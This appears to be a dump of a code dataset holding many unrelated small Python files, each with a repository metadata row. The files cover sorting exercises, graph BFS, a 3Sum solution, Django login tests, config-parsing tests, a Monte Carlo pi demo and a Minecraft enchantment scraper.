mobil.sort() # berdasarkan alfabet
print(mobil)
mobil.sort(reverse=True)
print(mobil)
# Mengetahui panjangnya list
print(len(mobil))
| true |
8957be7385185c33f9441b0c601fb8cc1b4d3290 | Python | evaportelance/generalized_wug_experiment | /human_generalization/experiments/03_experiment/stimuli/experiment3-make_stimuli.py | UTF-8 | 1,518 | 2.578125 | 3 | [] | no_license |
nonce_file = "./pilot-nonce-roots.txt"
noun_file = "./pilot-noun-contexts.txt"
verb_file = "./pilot-verb-contexts.txt"
adjective_file = "./pilot-adjective-contexts.txt"
stimuli_file = "./pilot-nonce-stimuli.txt"
def read_file(file_name):
category = file_name.split("-")[1]
items = []
with open(file_name) as f:
for line in f.readlines():
l = line.strip()
if len(l) >= 1:
items.append((category,l))
return items
def create_stimuli(roots, contexts):
stimuli = []
for i, (item,root) in enumerate(roots):
condition = i + 1
for category,context in contexts:
root_mod = root
if category != "noun" and root[-1] == "e":
root_mod = root[:-1]
prompt = context.replace("XXX", root)
prompt = prompt.replace("YYY", str(root_mod+"[BLANK1]"), 1).replace("YYY", str(root_mod+"[BLANK1]"), 1)
stimulus = "{condition: \"" + str(condition) + "\", item: \"" + item + "\", category: \"" + category + "\", context: \"" + context + "\", root: \"" + root + "\", prompt: \"" + prompt + "\"}"
stimuli.append(stimulus)
condition = (condition + 1) % 30
return stimuli
### MAIN ###
roots = read_file(nonce_file)
contexts = read_file(noun_file) + read_file(verb_file) + read_file(adjective_file)
stimuli = create_stimuli(roots, contexts)
with open(stimuli_file, "w") as f:
for stimulus in stimuli:
f.write(stimulus)
f.write(",\n")
| true |
6eff6166bf44377d0cc462b658091d7638665f5d | Python | m-and-ms/Competitve-Programming-and-algorithms- | /bfs_diamater_tree.py | UTF-8 | 1,812 | 3.25 | 3 | [] | no_license | # 0
#diameter of n-aray tree using bfs let tree is 1 2
# 2 3 4 4 7 6 d=7 is between 5 and 5 leaves
# 5 7
# 5
from collections import defaultdict
def bfs_diamter(src, num, adj):
    """Breadth-first search from `src` over nodes 0..num-1.

    Args:
        src: starting node id.
        num: total number of node slots (unreached ones keep distance -1).
        adj: adjacency mapping node -> list of neighbour nodes.

    Returns:
        (max_dist, farthest_node): the largest BFS distance found and the
        first node achieving it.  Also prints the distance list (kept from
        the original for parity).
    """
    # PERF: deque.popleft() is O(1); the original list.pop(0) was O(n).
    queue = deque([src])
    visted = [False] * num
    dist = [-1] * num
    visted[src] = True
    dist[src] = 0
    while queue:
        parent = queue.popleft()
        for child in adj[parent]:
            if not visted[child]:
                visted[child] = True
                queue.append(child)
                dist[child] = dist[parent] + 1
    big = max(dist)
    print(dist)
    return (big, dist.index(big))
def build_adj(adj, u, v):
    """Record the directed edge u -> v in `adj` (a defaultdict(list))."""
    adj[u] += [v]
def main():
    """Build the sample tree and report its diameter via two-pass BFS."""
    num_nodes = 7
    adj = defaultdict(list)
    # Edge list preserves the original insertion order; note some edges are
    # recorded in one direction only, exactly as in the original.
    edges = [(1, 2), (1, 3), (1, 6), (2, 4), (2, 1),
             (3, 1), (2, 5), (4, 2), (5, 2), (6, 1)]
    for u, v in edges:
        build_adj(adj, u, v)
    max_points = get_diameter(adj, 1, num_nodes)
def get_diameter(adj, src, num_nodes):
    """Compute the graph diameter (longest shortest path) via double BFS.

    A first BFS from ``src`` locates the node farthest from it; a second
    BFS from that node reaches the true diameter endpoint.  Prints the
    intermediate results like the original and returns the diameter length.
    """
    # BUG FIX: the first BFS previously hard-coded node 1 as the start,
    # silently ignoring the ``src`` argument.
    max_point = bfs_diamter(src, num_nodes, adj)
    print(max_point)
    far_most = bfs_diamter(max_point[1], num_nodes, adj)
    total_dst = far_most[0]
    print(total_dst)
    # Return the value as well (the original only printed it and returned
    # None); callers that ignored the result are unaffected.
    return total_dst
main()
| true |
ef2e936daf2b572f021bf7b046f733dcd8e81233 | Python | suyashgautam44/Hacker-Rank-projects | /Designer_PDF.py | UTF-8 | 498 | 3.078125 | 3 | [] | no_license | import sys
# HackerRank "Designer PDF Viewer": the highlighted area is
# (height of the tallest letter in the word) * (word length).
# NOTE: this is Python 2 code (raw_input, print statement).
#h = map(int, raw_input().strip().split(' '))
word = raw_input().strip()
# Per-letter heights a..z.  NOTE(review): normally these come from stdin
# (see the commented-out line above); this hard-coded sample only varies
# for the first ten letters -- confirm against the intended test case.
h = [1, 3, 1, 3, 1, 4, 1, 3, 2, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5,
 5, 5, 5, 5, 5, 5]
new_list = []
alphabets = ['a','b','c','d','e','f','g','h','i','j',
 'k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z']
# Map each letter to its height.
ld = dict(zip(alphabets, h))
#for every element in dictionary, if that element is also in word, get its keys
x = [ld[x] for x in ld if x in word]
# Area = tallest letter height * number of letters.
y = max(x)*len(word)
print y
| true |
366c04208e7d045180a78f1e1448e40afaa2e4ae | Python | JustinOng/MDP---Group-13 | /algorithms/src/dto/ArenaStringParser.py | UTF-8 | 1,662 | 3.03125 | 3 | [] | no_license | from src.dto.arena import Arena
from src.dto.constants import *
from src.dto.coord import Coord
class ArenaStringParser:
    """Builds an Arena from a flat obstacle-map string ('1'/'0' per cell)."""

    @staticmethod
    def parse_arena_string(string: str) -> Arena:
        """Parse ``string`` (rows top to bottom, optional newlines) into an Arena.

        '1' marks an obstacle.  Cells on the arena border or adjacent
        (8-connected) to an obstacle are flagged as dangerous.
        """
        cl = list(string)
        arena = Arena()
        # set obstacles in arena
        obstacle_list = []
        i = 0
        for y in range(MAP_ROW - 1, -1, -1):  # counting from top to bottom
            for x in range(MAP_COL):
                coord = Coord(x, y)
                if cl[i] == '\n':  # skip a row separator, if present
                    i = i + 1
                if cl[i] == '1':
                    arena.get_cell_at_coord(coord).increment_is_obstacle(delta=4)
                    obstacle_list.append(coord)
                elif cl[i] == '0':
                    pass  # not obstacle assumed
                i = i + 1
                if y in [0, MAP_ROW - 1] or x in [0, MAP_COL - 1]:
                    # cells at edge of arena are too close to the walls
                    arena.get_cell_at_coord(coord).set_is_dangerous(True)
        # set danger flag for cells too close to obstacles
        # (displacement list hoisted out of the loop -- it is invariant)
        displacements = [
            Coord(-1, -1), Coord(-1, 0), Coord(-1, 1),
            Coord(0, -1), Coord(0, 1),
            Coord(1, -1), Coord(1, 0), Coord(1, 1),
        ]
        for obs in obstacle_list:
            for d in displacements:
                dangerous_coord = obs.add(d)
                # CONSISTENCY FIX: bounds-check against the map constants
                # instead of the magic numbers 15/20 used before, so the
                # check stays correct if the arena dimensions change.
                if (0 <= dangerous_coord.get_x() < MAP_COL
                        and 0 <= dangerous_coord.get_y() < MAP_ROW):
                    arena.get_cell_at_coord(dangerous_coord).set_is_dangerous(True)
        return arena
| true |
098d6f49013fb8ffdb2eb83deaf20c52894835b4 | Python | Benjamin1361/python | /hello.py | UTF-8 | 2,416 | 3.234375 | 3 | [] | no_license | """
print('hello')
print('all around the world'[8].upper())
name = 'Ben'
print(name)
age=27
print(age)
fav_food='kebab'
print(fav_food)
print('my_fav_food is {}'.format(fav_food))
print('hello my name is {} and i ma {} years old. {} is my fav food'.format(name, age, fav_food))
i=10
i=i+2
i +=2
print(i)
subtract= 10
subtract -= 5
print(subtract)
fav_drink= 'wine'
print(fav_drink)
my_fav_sport= 'football'
print('may name is {} and {} is my fav sport'.format(name,my_fav_sport))
name= 'Korosh'
age= '37'
favourit_colour= 'red'
my_friend= 'korosh'
print('my friend is {},he is {} and he likes {} as favourit colour'.format (my_friend,age,favourit_colour))
breackfast='milk and toast'
lunch='chiken and rice'
dinner='just sald'
print('I had {} for breackfast, {} for luch and {} for dinner as i can not have heavy meal by night time'.format(breackfast,lunch,dinner))
print(" ")
breackfast='egg'
lunch='sandwich'
dinner='some fruit'
print('I hava plan for tomorrow to have {} for breackfast,{} for lunch time and just {} for dinner'.format(breackfast,lunch,dinner))
from datetime import date
d1=date(1982,12,29)
d2=date(2019,11,12)
delta = d2 - d1
print(delta.days)
print (' | | ')
print (' | | ')
print (' | | ')
print ('--------------------------')
print (' | | ')
print (' | | ')
print (' | | ')
print ('--------------------------')
print (' | | ')
print (' | | ')
print (' | | ')
"""
# Tic-tac-toe board mock-up: nine slot variables, drawn with hard-coded
# prints.  Empty string means an unoccupied slot.
space1 = 'o'
space2 = 'x'
space3 = ''
space4 = ''
space5 = 'o'
space6 = 'x'
space7 = 'x'
space8 = 'o'
space9 = ''
# NOTE(review): only spaces 1-6 are ever rendered below; 7-9 are unused
# and the bottom row is printed empty.
print ('------------------------')
print (' | | ')
print ('{} | {} | {} '.format(space1, space2, space3))
print (' | | ')
print (' | | ')
print ('------------------------')
print (' | | ')
print (' | | ')
print (' {} | {} {} |'.format(space4,space5,space6))
print (' | | ')
print ('------------------------')
print (' | | ')
print (' | | ')
print (' | | ')
print (' | | ')
print ('------------------------')
| true |
75f8c959741bb5143e7ce13ee2e1f6e505199d49 | Python | NicoR10/PythonUNSAM | /ejercicios_python/burbujeo.py | UTF-8 | 1,167 | 3.390625 | 3 | [] | no_license | import random
import matplotlib.pyplot as plt
# Sample inputs for the bubble-sort demo below.
lista_1 = [1, 2, -3, 8, 1, 5]
lista_2 = [1, 2, 3, 4, 5]
lista_3 = [0, 9, 3, 8, 5, 3, 2, 4]
lista_4 = [10, 8, 6, 2, -2, -5]
lista_5 = [2, 5, 1, 0]
def ord_burbujeo(lista):
    """Bubble-sort a copy of ``lista`` in ascending order.

    Returns (sorted_copy, comparison_count); the input list is not mutated.
    The comparison count is always n*(n-1)/2 since no early exit is used.
    """
    datos = lista.copy()
    comparaciones = 0
    for tope in range(len(datos), 0, -1):
        for pos in range(tope - 1):
            comparaciones += 1
            if datos[pos] > datos[pos + 1]:
                datos[pos], datos[pos + 1] = datos[pos + 1], datos[pos]
    return datos, comparaciones
# Sort the five fixed samples (results currently unused beyond binding).
ordenada_1, comp_nico1 = ord_burbujeo(lista_1)
ordenada_2, comp_nico2 = ord_burbujeo(lista_2)
ordenada_3, comp_nico3 = ord_burbujeo(lista_3)
ordenada_4, comp_nico4 = ord_burbujeo(lista_4)
ordenada_5, comp_nico5 = ord_burbujeo(lista_5)
# Measure comparisons for random lists of length 1..256 and plot the
# curve against the O(n^2) and O(n) references.
comp = []
largo = list(range(1, 257))
n_cuadrado = [n**2 for n in largo]
o_n = [n for n in largo]
for n in range(1, 257):
    lista = [random.randint(0,1000) for _ in range(n)]
    ordenada, comparaciones = ord_burbujeo(lista)
    comp.append(comparaciones)
plt.figure(1)
plt.plot(comp, label='Burbujeo')
plt.plot(n_cuadrado, label='O(n2)')
plt.plot(o_n, label='O(n)')
# Zoom in on the small-n region where the curves are distinguishable.
plt.xlim([1, 100])
plt.ylim([0, 300])
plt.legend(title='Comparaciones') | true |
ddb47f6e1fc64f3cb5873f8af9a5603a06654a12 | Python | irineos/PiDay2019 | /mc_pi.py | UTF-8 | 2,104 | 3.265625 | 3 | [
"MIT"
] | permissive | import numpy as np
import cv2
import random
import math
import matplotlib.pyplot as plt
def point(img, w, h, colour):
    """Paint the single pixel at column ``w``, row ``h`` with ``colour``."""
    img[h, w] = colour
def mc_pi(window_size,points):
    """Monte-Carlo estimate of pi with a live OpenCV visualisation.

    Throws random darts at a square of side 2r with an inscribed circle;
    pi ~= 4 * (hits inside circle / total throws).  Green pixels are
    hits, red are misses.  Runs until more than ``points`` samples have
    been drawn (or the user presses 'q'), then returns the estimate.
    """
    r = window_size//2
    height, width = window_size+1, window_size+1
    img = np.zeros((height, width, 3), np.uint8)
    cv2.rectangle(img,(0,0),(r*2,r*2),(255,255,255),2)
    cv2.circle(img,(r,r), r, (255,255,255), 2)
    total_counter = 0
    circle_counter = 0
    while True:
        # Draw samples in batches of 10 between screen refreshes.
        for _ in range(10):
            x = random.randint(0,2*r)
            y = random.randint(0,2*r)
            dist = math.sqrt( (r - x)**2 + (r - y)**2 )
            if dist < r:
                point(img,x,y,(0,255,0))
                circle_counter += 1
            else:
                # Points exactly on the circle count as misses.
                point(img,x,y,(0,0,255))
            total_counter += 1
        pi = (circle_counter/total_counter) * 4
        if(total_counter > points):
            print("points =",points," : ","pi =",pi)
            break
        cv2.imshow('pi', img)
        # waitKey also services the GUI event loop; 'q' aborts early.
        if cv2.waitKey(25) & 0xFF == ord('q'):
            break
    cv2.destroyAllWindows()
    return pi
def autolabel(rects):
    """Annotate each bar in ``rects`` with its height, just above the bar.

    Relies on the module-level matplotlib axes object ``ax``.
    """
    for bar in rects:
        value = bar.get_height()
        ax.annotate(
            '{}'.format(value),
            xy=(bar.get_x() + bar.get_width() / 2, value),
            xytext=(0, 3),
            textcoords="offset points",
            ha='center',
            va='bottom',
        )
# Interactive driver: repeatedly ask for a sample count, run the Monte
# Carlo simulation, and finally show a bar chart of the estimates.
points = []
pies = []
while True:
    print("Enter number of points")
    key = input()
    if(key == "q"):
        break
    # NOTE(review): non-numeric input other than "q" raises ValueError here.
    num_of_points = int(key)
    if num_of_points > 0 :
        points.append(num_of_points)
        pi = mc_pi(600,num_of_points)
        pies.append(pi)
# NOTE(review): sorting ``points`` without reordering ``pies`` can pair
# bars with the wrong x labels when inputs were not entered in order.
points.sort()
x = np.arange(len(points))
width = 0.35
fig, ax = plt.subplots()
rect1 = ax.bar(x , pies, width)
ax.set_ylabel('PI')
ax.set_title('Number Of Points')
ax.set_xticks(x)
ax.set_xticklabels(points)
autolabel(rect1)
fig.tight_layout()
plt.show()
| true |
7da1531c5b97fd1c826e9eb8e31140f3a44c19ed | Python | AnaghaKrish/Two-Pointers-1 | /Problem34.py | UTF-8 | 1,380 | 4.0625 | 4 | [] | no_license | """
Given an array nums of n integers, are there elements a, b, c in nums such that a + b + c = 0?
Find all unique triplets in the array which gives the sum of zero.
Note:
The solution set must not contain duplicate triplets.
Example:
Given array nums = [-1, 0, 1, 2, -1, -4],
A solution set is:
[
[-1, 0, 1],
[-1, -1, 2]
]
"""
# Classic two-pointer 3Sum: sort, fix the smallest element of each triple,
# then scan the remainder from both ends, skipping duplicate values so the
# result contains only unique triplets.
nums = [-1, 0, 1, 2, -1, -4]
nums = sorted(nums)
res = []
for i in range(len(nums) - 2):
    if i > 0 and nums[i] == nums[i - 1]:
        continue  # duplicate anchor -> already handled
    lo, hi = i + 1, len(nums) - 1
    while lo < hi:
        total = nums[i] + nums[lo] + nums[hi]
        if total < 0:
            lo += 1
        elif total > 0:
            hi -= 1
        else:
            res.append([nums[i], nums[lo], nums[hi]])
            # Skip over duplicate values on both sides before moving on.
            while lo < hi and nums[lo] == nums[lo + 1]:
                lo += 1
            while lo < hi and nums[hi] == nums[hi - 1]:
                hi -= 1
            lo += 1
            hi -= 1
print(res)
"""
1)Sort the array
2)Take three pointers, i which points to the curr element, left and right
3)left = i+1 and right starts from the end of the List
4)sum = i + left + right.
5)if sum > 0: decrement right, <0 increment left else append the values to res.
6)print result
Time Complexity = O(n^3)
Space Complexity = O(n)
"""
| true |
f6c4a2d9e4632376a2847529856e4f3fa87b074d | Python | chenxiaoli/auth21 | /api/tests.py | UTF-8 | 9,466 | 2.765625 | 3 | [
"MIT"
] | permissive | # -*- coding: utf-8 -*-
from django.test import TestCase
from rest_framework import status
from rest_framework.reverse import reverse
from rest_framework.test import APITestCase, APIClient
from . import models
class UserAttributeTests(TestCase):
    """Unit tests for the User model's password hashing behaviour."""
    def test_password_setter(self):
        """After assigning ``password``, ``password_hash`` is populated."""
        u = models.User(password='cat')
        self.assertTrue(u.password_hash is not None)
    def test_no_password_getter(self):
        """Reading ``password`` back raises AttributeError (write-only)."""
        u = models.User(password='cat')
        with self.assertRaises(AttributeError):
            print(u.password)
    def test_password_verification(self):
        """check_password accepts the right password and rejects a wrong one."""
        u = models.User(password='cat')
        self.assertTrue(u.check_password('cat'))
        self.assertFalse(u.check_password('dog'))
    def test_password_salts_are_random(self):
        """Equal passwords must hash differently (random salt)."""
        u = models.User(password='cat')
        u2 = models.User(password='cat')
        self.assertTrue(u.password_hash != u2.password_hash)
    def test_password_hash(self):
        # NOTE(review): the second half assigns password_hash directly and
        # then matches the raw string -- this implies check_password falls
        # back to comparing plain values; confirm that is intended.
        user = models.User()
        user.password = '123456'
        user.save()
        self.assertEqual(user.check_password('123456'), True)
        user.password_hash = '21fax.com'
        user.save()
        self.assertEqual(user.check_password('21fax.com'), True)
class MobilesTestCase(APITestCase):
    """Tests for helpers.is_mobile covering the Chinese mobile prefixes."""

    def test_mobiles(self):
        from .helpers import is_mobile
        # Assigned mobile ranges (same set the original asserted one by one).
        valid = [
            '13000000000', '13100000000', '13200000000', '13300000000',
            '13400000000', '13490000000', '13500000000', '13600000000',
            '13700000000', '13800000000', '13900000000', '14500000000',
            '14700000000', '15000000000', '15100000000', '15200000000',
            '15300000000', '15500000000', '15600000000', '15700000000',
            '15800000000', '15900000000', '17000000000', '17050000000',
            '17090000000', '17600000000', '17700000000', '17800000000',
            '18000000000', '18100000000', '18200000000', '18300000000',
            '18400000000', '18500000000', '18600000000', '18700000000',
            '18800000000', '18900000000',
        ]
        for number in valid:
            # Pass the number as msg so a failure names the offending prefix.
            self.assertTrue(is_mobile(number), number)
        # Prefixes outside the assigned ranges.
        invalid = [
            '14000000000', '14100000000', '14200000000', '14300000000',
            '14400000000', '14600000000', '14800000000', '14900000000',
            '15400000000', '17100000000', '17200000000', '17300000000',
            '17400000000', '17500000000', '17900000000',
        ]
        for number in invalid:
            self.assertFalse(is_mobile(number), number)
        # Length checks: exactly 11 digits are required.
        self.assertTrue(is_mobile('13888888888'))
        for number in ('138888888', '1388888888', '138888888888', '1388888888888'):
            self.assertFalse(is_mobile(number), number)
class UserLoginTests(APITestCase):
    """Tests for the v1 login endpoint (username / email / mobile / SMS / weixin)."""

    PASSWORD = '21fax.com'

    def _make_user(self, activated=True, **extra):
        """Create and save the standard test user; returns the User instance."""
        user = models.User()
        if activated:
            user.account_state = user.ACCOUNT_STATE_ACTIVATED
        user.username = '21fax'
        user.email = 'test@21fax.com'
        user.mobile = '13866668888'
        user.password = self.PASSWORD
        for attr, value in extra.items():
            setattr(user, attr, value)
        user.save()
        return user

    def _login(self, username, password):
        """POST the credentials to the login endpoint and return the response."""
        return self.client.post(
            reverse('v1:login'),
            {'username': username, 'password': password},
            format='json')

    def _assert_login_ok(self, username, password):
        """Assert the credentials log in successfully and yield a token."""
        response = self._login(username, password)
        self.assertEqual(response.status_code, status.HTTP_200_OK)
        self.assertIn('token', response.data)

    def test_login_missing_fields(self):
        # 表单不完整 -- an empty form must report both missing fields.
        response = self.client.post(reverse('v1:login'))
        self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
        self.assertContains(response, 'username', count=1, status_code=status.HTTP_400_BAD_REQUEST)
        self.assertContains(response, 'password', count=1, status_code=status.HTTP_400_BAD_REQUEST)

    def test_login_user_unactivated(self):
        # A non-activated account must be rejected on every credential type.
        user = self._make_user(activated=False)
        for username in (user.username, user.email, user.mobile):
            response = self._login(username, self.PASSWORD)
            self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)

    def test_login_via_username(self):
        user = self._make_user()
        self._assert_login_ok(user.username, self.PASSWORD)

    def test_login_via_email(self):
        user = self._make_user()
        self._assert_login_ok(user.email, self.PASSWORD)

    def test_login_via_mobile(self):
        user = self._make_user()
        self._assert_login_ok(user.mobile, self.PASSWORD)

    def test_login_via_mobile_and_code(self):
        # Request an SMS login code, then authenticate with mobile + code.
        user = self._make_user()
        sms_auth_token = '21fax.com'
        with self.settings(SMS_AUTH_TOKEN=sms_auth_token):
            _res = self.client.post(
                reverse('v1:send_sms_code'),
                {'mobile': user.mobile, 'context': models.SMSCode.CONTEXT_LOGIN, 'token': sms_auth_token},
                format='json')
            self.assertEqual(_res.status_code, status.HTTP_200_OK)
            _code = models.SMSCode.objects.get(mobile=user.mobile, context=models.SMSCode.CONTEXT_LOGIN)
            self._assert_login_ok('13866668888', _code.code)

    def test_login_via_weixin(self):
        user = self._make_user(wx_openid='okweifsodlweka2342oaiflid')
        self._assert_login_ok(user.wx_openid, 'weixin')
| true |
e458d4270f2635c53acbf7221d1ae3d4645f5fc0 | Python | jijinggang/test_python | /test_config.py | UTF-8 | 862 | 3.390625 | 3 | [] | no_license | from typing import Protocol
import yaml
import toml
txt_yaml = """
site:
port: 80
pages: [homepage, about]
cached: true
lang:
en:
homepage: homepage
about: about
cn:
homepage : 主页
about : 关于
"""
txt_toml = """
[site]
port = 80
pages=['homepage','about']
cached = true
[lang.en]
homepage = 'homepage'
about = 'about'
[lang.cn]
homepage = '主页'
about = '关于'
"""
def assert_data(data):
    """Sanity-check a parsed config: site port/pages and the cn 'about' label."""
    assert data['site']['port'] == 80
    assert len(data['site']['pages']) == 2
    assert data['lang']['cn']['about'] == '关于'
def test_yaml():
    """Round-trip the YAML sample: parse, validate, and dump it back."""
    parsed = yaml.full_load(txt_yaml)
    assert_data(parsed)
    print(yaml.dump(parsed))
def test_toml():
    """Round-trip the TOML sample: parse, validate, and dump it back."""
    parsed = toml.loads(txt_toml)
    assert_data(parsed)
    print(toml.dumps(parsed))
# Exercise both parser round-trips when the module is executed.
test_yaml()
test_toml()
| true |
09dc9d9329d21c6d64f0e7c511d43fb3c85887a9 | Python | broadlxx/171-172-271python- | /dayi/tutorial 6/Optional.py | UTF-8 | 773 | 3.453125 | 3 | [] | no_license | import random
# Rock-paper-scissors against a random computer pick.  "ping" is printed
# on a tie; any answer other than 1 to the replay prompt exits.
# NOTE(review): a player entry outside {rock, paper, scissors} is silently
# scored as a computer win, and a non-numeric replay answer raises ValueError.
while True:
    Computer_choice=random.randint(0,2)
    # Map 0/1/2 onto the three moves.
    if Computer_choice==0:
        Computer_choice="rock"
    elif Computer_choice==1:
        Computer_choice="paper"
    else :
        Computer_choice="scissors"
    People_choice=input("Please enter the rock paper scissors randomly: ")
    if People_choice==Computer_choice:
        print("ping")
    elif (People_choice=="rock")and(Computer_choice=="scissors"):
        print("you win")
    elif (People_choice=="paper")and(Computer_choice=="rock"):
        print("you win")
    elif (People_choice=="scissors")and(Computer_choice=="paper"):
        print("you win")
    else:
        print("The computer win")
    A=int(input("If you want to play again.Please input 1:"))
    if A==1:
        pass
    else:
        break
| true |
1c115f88a5871c17e8d7964c90d5887ff71bb225 | Python | daniel-reich/ubiquitous-fiesta | /8vBvgJMc2uQJpD6d7_5.py | UTF-8 | 257 | 3.28125 | 3 | [] | no_license |
def get_prime_factor(num):
    """Return the smallest prime factor of ``num``, or None if num < 2.

    The smallest divisor >= 2 of an integer is always prime.  Trial
    division only needs to run up to sqrt(num): if nothing in that range
    divides num, then num itself is prime -- this replaces the original
    O(num) scan with an O(sqrt(num)) one while returning identical values.
    """
    if num < 2:
        return None
    x = 2
    while x * x <= num:
        if num % x == 0:
            return x
        x += 1
    return num
def prime_factors(num):
    """Return the prime factorisation of ``num`` in non-decreasing order.

    Repeatedly divides out the smallest prime factor until none remains,
    e.g. 12 -> [2, 2, 3].  Numbers below 2 yield an empty list.
    """
    factors = []
    factor = get_prime_factor(num)
    while factor:
        factors.append(factor)
        num //= factor
        factor = get_prime_factor(num)
    return factors
| true |
cbb1bcb33f02b1e6da4fa362d4b5e7b38f8d1888 | Python | erjan/coding_exercises | /count_operations_to_obtain_zero.py | UTF-8 | 1,001 | 4.09375 | 4 | [
"Apache-2.0"
] | permissive | '''
You are given two non-negative integers num1 and num2.
In one operation, if num1 >= num2, you must subtract num2 from num1, otherwise subtract num1 from num2.
For example, if num1 = 5 and num2 = 4, subtract num2 from num1, thus obtaining num1 = 1 and num2 = 4. However, if num1 = 4 and num2 = 5, after one operation, num1 = 4 and num2 = 1.
Return the number of operations required to make either num1 = 0 or num2 = 0.
'''
class Solution:
    def countOperations(self, num1: int, num2: int) -> int:
        """Subtract the smaller value from the larger until one hits zero.

        Prints a trace line per round plus the final count (as the
        original did) and returns the number of rounds performed.
        """
        a, b = num1, num2
        rounds = 0
        while a != 0 and b != 0:
            print('n1:', a, ' n2:', b)
            rounds += 1
            if a >= b:
                a -= b
            else:
                b -= a
        print(rounds)
        return rounds
class Solution:
    def countOperations(self, a: int, b: int) -> int:
        """Count subtract-the-smaller steps until ``a`` or ``b`` reaches zero.

        Iterative Euclidean form of the original recursion: each division
        a // b summarises one run of identical subtractions.
        """
        steps = 0
        while a != 0 and b != 0:
            steps += a // b
            a, b = b, a % b
        return steps
| true |
bcd26090d882cd8d0807450ca082de96d06ac7ee | Python | shravani-dev/python_03012021 | /apps/colors/view/colors_table.py | UTF-8 | 368 | 3.5 | 4 | [
"MIT"
def color_table(colors):
    """Render ``colors`` (dicts with id/name/hexcode keys) as an aligned table.

    Returns the table as one newline-joined string; an empty input yields
    a placeholder row instead of data lines.
    """
    lines = ["Id Name Hexcode", "-----------------------"]
    if not colors:
        lines.append("There are no colors")
    else:
        lines.extend(
            f"{str(c['id']).rjust(2)} {c['name'].ljust(12)} {c['hexcode']}"
            for c in colors
        )
    return "\n".join(lines)
2d1e0e23217d5041d4c4c4a1ee29f5e3fa32ebf0 | Python | clamytoe/mc_enchant | /mc_enchant/tools.py | UTF-8 | 5,601 | 2.921875 | 3 | [
"MIT"
] | permissive | import json
from collections import defaultdict
from dataclasses import dataclass, field
from functools import total_ordering
from pathlib import Path
from re import compile, search
from typing import Any, DefaultDict, List
from urllib.request import urlretrieve
from bs4 import BeautifulSoup as Soup
out_dir = Path("/tmp")
html_file = out_dir / "enchantment_list_pc.html"
json_file = Path.home() / "mc_items.json"
HTML_FILE = Path(html_file)
ROMAN = {"I": 1, "II": 2, "III": 3, "IV": 4, "V": 5}
URL = "https://www.digminecraft.com/lists/enchantment_list_pc.php"
# @total_ordering (applied first, being the inner decorator) derives
# <=, >, >= from __lt__ plus the dataclass-generated __eq__; ordering is
# by id_name only.
@dataclass
@total_ordering
class Enchantment:
    """Minecraft enchantment, keyed by its machine-readable ``id_name``."""
    id_name: str
    name: str
    max_level: int  # highest obtainable level (arabic; built via the ROMAN map)
    description: str
    items: List[str] = field(default_factory=list)  # item names it applies to
    def __str__(self):
        return f"{self.name} ({self.max_level}): {self.description}"
    def __lt__(self, other):
        return self.id_name < other.id_name
@dataclass
class Item:
    """Minecraft enchantable item with its applicable enchantments."""
    name: str  # human-readable name (underscores replaced with spaces)
    enchantments: List[Enchantment] = field(default_factory=list)
    def __str__(self):
        # One indented "[level] id_name" line per enchantment, sorted by id.
        enchants = sorted(self.enchantments)
        enc_list = [f"\n [{enc.max_level}] {enc.id_name}" for enc in enchants]
        return f"{self.name.title()}: {''.join(enc_list)}"
def clean_up_names(item_names):
    """Normalise an image filename stem into space-separated item words.

    :param item_names: String of item names (an image filename stem)
    :return: String of cleaned up item names

    Strips decoration fragments (".png", "_sm", "iron_", "enchanted_"),
    splits on underscores, and protects "fishing_rod" so its internal
    underscore survives the split.
    """
    # Temporarily fuse fishing_rod so the underscore split keeps it whole.
    cleaned = item_names.replace("fishing_rod", "fishingrod")
    for fragment in (".png", "_sm", "iron_", "enchanted_"):
        cleaned = cleaned.replace(fragment, "")
    words = [
        "fishing_rod" if word == "fishingrod" else word
        for word in cleaned.split("_")
    ]
    return " ".join(words)
def enchantable_items(soup):
    """Scrape the items table for the item name(s) attached to each row.

    :param soup: BeautifulSoup object
    :return: List of word-lists, one per table row, taken from the row's
        image filename via ``clean_up_names``.
    """
    table = soup.find("table", {"id": "minecraft_items"})
    names = []
    for img in table.find_all("img"):
        stem = img["data-src"].split("/")[-1]
        names.append(clean_up_names(stem).split())
    return names
def export_data(data, out_file=json_file):
    """Serialise the item mapping to the JSON cache file.

    :param data: mapping of Item objects (serialised via their __dict__)
    :param out_file: Path object to save data to
    :return: None
    """
    # NOTE(review): the payload is JSON-encoded twice -- dumps() produces a
    # JSON string and json.dump() then writes that string as a JSON string
    # literal.  load_data() compensates with a matching double loads(), so
    # changing one side requires changing the other in lockstep.
    mc_json = json.dumps(data, default=lambda x: x.__dict__)
    with out_file.open("w") as f:
        json.dump(mc_json, f)
def generate_enchantments(soup):
    """Build a dictionary of Enchantment objects from the scraped page.

    :param soup: BeautifulSoup object
    :return: DefaultDict of Enchantment objects keyed by id_name

    Combines the parsed table rows (title / roman level / description)
    with the per-row item lists scraped from the same table.
    """
    item_rows = enchantable_items(soup)
    rows = parse_html(soup)
    enchants: DefaultDict[Any, Enchantment] = defaultdict(Enchantment)
    for row_index, row in enumerate(rows):
        id_name, name = split_title(row[0])
        enchants[id_name] = Enchantment(
            id_name, name, ROMAN[row[1]], row[2], item_rows[row_index]
        )
    return enchants
def generate_items(data):
    """Invert enchantment data into a dictionary of Item objects by name.

    :param data: DefaultDict of Enchantment objects
    :return: DefaultDict of Item objects

    Every unique item name gets an Item whose enchantment list holds each
    Enchantment that applies to it.
    """
    catalogue: DefaultDict[Any, Item] = defaultdict(Item)
    for name in gen_item_set(data):
        catalogue[name] = Item(name.replace("_", " "))
    for enchantment in data.values():
        for name in enchantment.items:
            catalogue[name].enchantments.append(enchantment)
    return catalogue
def gen_item_set(data):
    """Collect every item name appearing in ``data``'s enchantments.

    :param data: Dictionary of Enchantment objects
    :return: sorted list of the unique item names (despite the name,
        the return value is a list, not a set)
    """
    unique = {
        name
        for enchantment in data.values()
        for name in enchantment.items
    }
    return sorted(unique)
def get_soup(file=HTML_FILE):
    """Retrieves source HTML and returns a BeautifulSoup object

    :param file: Path object pointing at a cached HTML file, or any
        markup/handle BeautifulSoup accepts directly
    :return: BeautifulSoup object
    """
    if isinstance(file, Path):
        # Cache miss: download the page from URL into the given path.
        if not file.is_file():
            urlretrieve(URL, file)
        with file.open() as html_source:
            soup = Soup(html_source, "html.parser")
    else:
        # Non-Path input is handed to BeautifulSoup as-is (e.g. a string).
        soup = Soup(file, "html.parser")
    return soup
def load_data(file=json_file):
